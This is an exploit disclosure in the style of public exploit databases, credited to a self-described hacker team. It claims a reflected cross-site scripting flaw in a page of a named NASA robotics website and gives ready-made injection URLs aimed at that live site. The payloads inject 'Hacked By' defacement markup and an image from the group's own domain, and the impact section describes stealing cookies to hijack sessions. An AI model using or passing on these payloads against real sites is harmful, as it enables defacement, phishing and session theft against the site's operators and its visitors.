################################################################### # Exploit Title : National Aeronautics and Space Administration Robotics Alliance Project Reflected XSS Cross Site Scripting # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 20/08/2019 # Vendor Homepage : robotics.nasa.gov # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/ascii/WLB-2019010038 ################################################################### Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) : ********************************************************* The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example,can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system. ################################################################### # Reflected Cross Site Scripting XSS Exploits and Payloads : ******************************************************* /first/houseteamlist.php?year=1'<marquee%20><font%20color= lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee> /first/houseteamlist.php?year=<center><img%20src= "https://www.cyberizm.org/images/logo.png"%20width="500"%20height="500"> </center><font%20color="red"%20size="100px"%20face= "courier%20new">XSS-Vulnerability-Discovered-ByHacked%20By%20%20KingSkrupellos%85 ################################################################### # Example Vulnerable Sites : ************************* [+] robotics.nasa.gov/first/houseteamlist.php?year=%3Ccenter%3E%3Cimg%20src= %22https://www.cyberizm.org/images/logo.png%22%20width=%22500%22%20 height=%22500%22%3E%3C/center%3E%3Cfont%20color=%22red%22%20size= %22100px%22%20face=%22courier%20new%22%3EHacked%20By%20%20KingSkrupellos%85 [+] robotics.nasa.gov/first/houseteamlist.php?year=1'<marquee%20><font%20color= lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee> ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################